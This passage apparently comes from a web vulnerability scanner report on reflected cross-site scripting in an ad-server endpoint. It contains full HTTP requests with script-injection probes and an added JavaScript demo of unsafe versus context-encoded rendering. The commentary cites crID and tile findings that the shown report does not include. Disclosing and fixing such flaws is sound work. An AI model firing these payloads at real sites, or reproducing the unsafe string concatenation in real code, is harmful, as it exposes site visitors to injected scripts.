6.76. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net.76705.9611.302br.net
Path: /jss/adj/N1243.Glam.com/B5234896.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4519b"-alert(1)-"9c0b6de5ed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf?&4519b"-alert(1)-"9c0b6de5ed7=1 HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31976"-alert(1)-"424c6fac2e0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jss/adj/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf?31976"-alert(1)-"424c6fac2e0 HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e896c"><script>alert(1)</script>04d920b703b was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
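The findings in this section fall into three output contexts: a double-quoted JavaScript string (the `"-alert(1)-"` probes), a single-quoted JavaScript string (the tile finding's `';alert(1)//`), and a double-quoted HTML attribute (the fpid finding's `"><script>alert(1)</script>`). The block below is an added example, not code from the report or from the ad servers it lists: it rebuilds each context with the raw concatenation the findings imply, shows that the report's own probes execute against it, and pairs it with a context-specific encoder that neutralises all three without changing the value the browser ends up with. Parameter names come from the report; the templates, the `example.invalid` host names and the encoder functions are this example's own.

```javascript
// Added example; not code from the report or from the ad servers it lists.
// Three reflection contexts from the findings, rendered unsafely and safely,
// with the report's probes run through both.  Templates and host names are
// invented; parameter names (crID, tile, fpid) are the report's.

// Vulnerable rendering: the value is concatenated into the output unchanged,
// which is what "echoed unmodified in the application's response" means.
function renderUnsafe(params) {
  return [
    '<script>',
    'var url = "http://t.example.invalid/track_click?crID=' + params.crID + '";',
    "var tile = '" + params.tile + "';",
    '</script>',
    '<img src="http://example.invalid/pixel?fpid=' + params.fpid + '">',
  ].join('\n');
}

// For a value inside a JS string literal of either quote style: hex-escape
// everything outside a small allowlist.  \x22 and \x27 cannot end a literal,
// \x3c/script\x3e cannot end the <script> element, and \u2028/\u2029 cannot
// terminate a line, so the literal stays a literal whatever the input.
function jsStringEncode(s) {
  return String(s).replace(/[^A-Za-z0-9,._-]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// For a value inside a quoted HTML attribute: entity-encode the characters
// that can end the attribute or the tag.  This is a different encoding from
// the JS one; using either in the other's context is still exploitable.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same templates, each value encoded for its context.
function renderSafe(params) {
  return [
    '<script>',
    'var url = "http://t.example.invalid/track_click?crID=' + jsStringEncode(params.crID) + '";',
    "var tile = '" + jsStringEncode(params.tile) + "';",
    '</script>',
    '<img src="http://example.invalid/pixel?fpid=' + htmlAttrEncode(params.fpid) + '">',
  ].join('\n');
}

// The report's probe shapes, one per context.  The digits around each probe
// are the random markers the scanner uses to locate its own echo.
const PROBES = {
  crID: '60583"-alert(1)-"42928ca0e0e',
  tile: "e433a';alert(1)//574f9c7b613",
  fpid: 'e896c"><script>alert(1)</script>04d920b703b',
};

// Scanner view: does each probe come back byte-for-byte?
function probesEchoedUnmodified(renderer) {
  const out = renderer(PROBES);
  const result = {};
  for (const [name, probe] of Object.entries(PROBES)) result[name] = out.includes(probe);
  return result;
}

// Browser view: execute every <script> block in the rendered page with
// alert() stubbed and count how often injected code reaches it.
function alertsFired(renderer) {
  const html = renderer(PROBES);
  const re = /<script>([\s\S]*?)<\/script>/g;
  let fired = 0;
  let m;
  while ((m = re.exec(html)) !== null) new Function('alert', m[1])(() => { fired += 1; });
  return fired;
}

// Round trip: the hardened script still parses, and the variable the browser
// ends up with is the raw input, so escaping changed the source, not the data.
function decodedValue(name) {
  const script = renderSafe(PROBES).split('</script>')[0].replace('<script>', '');
  return new Function(script + '\nreturn { url: url, tile: tile };')()[name];
}
```

Against `renderUnsafe` every probe is echoed verbatim and `alertsFired` counts three executions: the double-quoted string is closed and reopened around `-alert(1)-`, the single-quoted one is closed and the rest of the line commented out with `//`, and the attribute probe closes the `<img>` tag and starts a second script element. Against `renderSafe` nothing is echoed verbatim and nothing fires, while `decodedValue('tile')` still equals the raw probe. `JSON.stringify` alone is not a substitute for `jsStringEncode` here: it escapes the quotes but leaves `<` and `>` raw, so a value containing `</script>` would still end the element.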